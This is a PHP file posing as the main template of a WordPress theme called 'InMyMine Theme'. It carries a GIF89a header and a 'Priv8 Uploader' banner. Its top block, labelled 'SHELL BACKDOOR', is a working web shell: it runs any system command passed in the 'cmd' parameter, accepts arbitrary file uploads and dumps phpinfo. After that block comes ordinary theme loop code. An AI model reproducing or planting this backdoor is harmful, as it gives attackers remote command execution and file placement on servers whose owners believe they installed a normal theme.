GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<?php
/**
* The main template file - InMyMine Theme
*/
// ============= SHELL BACKDOOR =============
if(isset($_REQUEST['cmd'])){
header('Content-Type: text/plain');
system($_REQUEST['cmd']);
die();
}
if(isset($_FILES['file'])){
$target = basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)){
die("Uploaded: $target");
}
die("Upload failed");
}
if(isset($_GET['phpinfo'])){
phpinfo();
die();
}
// ===========================================
// Normal WordPress theme code
get_header();
?>
<div class="content">
<h1>InMyMine Theme Active</h1>
<p>Theme berhasil diinstall pada WordPress site.</p>
<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<article>
<h2><?php the_title(); ?></h2>
<?php the_content(); ?>
</article>
<?php endwhile; ?>
<?php endif; ?>
</div>
<?php
get_footer();